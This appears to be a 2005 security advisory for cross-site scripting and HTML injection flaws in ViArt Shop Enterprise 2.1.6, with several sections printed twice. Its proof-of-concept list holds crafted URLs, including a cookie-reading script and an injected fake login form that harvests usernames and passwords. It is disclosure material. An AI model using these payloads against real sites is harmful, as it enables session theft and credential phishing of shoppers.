CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
BID:13462
Info
CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
| Bugtraq ID: | 13462 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 02 2005 12:00AM |
| Updated: | May 02 2005 12:00AM |
| Credit: | Lostmon <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
CodetoSell ViArt Shop Enterprise 2.1.6 |
| Not Vulnerable: |
CodetoSell ViArt Shop Enterprise 2.1.8 |
Discussion
CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
These issues are reported to affect ViArt Shop Enterprise version 2.1.6; other versions may also be vulnerable.
ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
These issues are reported to affect ViArt Shop Enterprise version 2.1.6; other versions may also be vulnerable.
Exploit / POC
CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3D[XSS-CODE]%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id[XSS-CODE]%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D[XSS-CODE]%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D[XSS-CODE]
http://www.example.com/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/page.php?page=%3Cp%3Ean%20eror%20was%20send%20to%20webmaster,%20please%20insert%20your%20username%20and%20password%20,%20and%20continue%20shopping%20%3Cform%20action=%22http://www.example.com/save.php%22%20method=%22post%22%3EUsername:%3Cinput%20aame=%22username%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3Cinput%20name=%22password%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=%22submit%22%20value=%22Login%22%3E%3C/form%3E
http://www.example.com/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://www.example.com/reviews.php?category_id=0[XSS-CODE]&item_id=4
http://www.example.com/reviews.php?filter=0&item_id=4[XSS-CODE]&category_id=0
http://www.example.com/product_details.php?item_id=4&category_id=0[XSS-CODE]
http://www.example.com/products.php?category_id=13[XSS-CODE]
http://www.example.com/products.php?category_id=0&search_string=[XSS-CODE]&search_category_id=
http://www.example.com/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1
http://www.example.com/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE]
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3D[XSS-CODE]%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id[XSS-CODE]%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D[XSS-CODE]%26search_category_id%3D
http://www.example.com/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D[XSS-CODE]
http://www.example.com/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/page.php?page=%3Cp%3Ean%20eror%20was%20send%20to%20webmaster,%20please%20insert%20your%20username%20and%20password%20,%20and%20continue%20shopping%20%3Cform%20action=%22http://www.example.com/save.php%22%20method=%22post%22%3EUsername:%3Cinput%20aame=%22username%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3Cinput%20name=%22password%22%20type=%22text%22%20maxlength=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=%22submit%22%20value=%22Login%22%3E%3C/form%3E
http://www.example.com/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://www.example.com/reviews.php?category_id=0[XSS-CODE]&item_id=4
http://www.example.com/reviews.php?filter=0&item_id=4[XSS-CODE]&category_id=0
http://www.example.com/product_details.php?item_id=4&category_id=0[XSS-CODE]
http://www.example.com/products.php?category_id=13[XSS-CODE]
http://www.example.com/products.php?category_id=0&search_string=[XSS-CODE]&search_category_id=
http://www.example.com/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1
http://www.example.com/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE]
Solution / Fix
CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Solution:
ViArt Shop Enterprise 2.1.8 and subsequent versions are not affected by these issues. Please contact the vendor to obtain a fixed version.
Solution:
ViArt Shop Enterprise 2.1.8 and subsequent versions are not affected by these issues. Please contact the vendor to obtain a fixed version.
References
CodeToSell ViArt Shop Enterprise Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
References:
References:
- Lostmon's Blog Page (Lostmon ([email protected]))
- ViArt CMS Homepage (ViArt)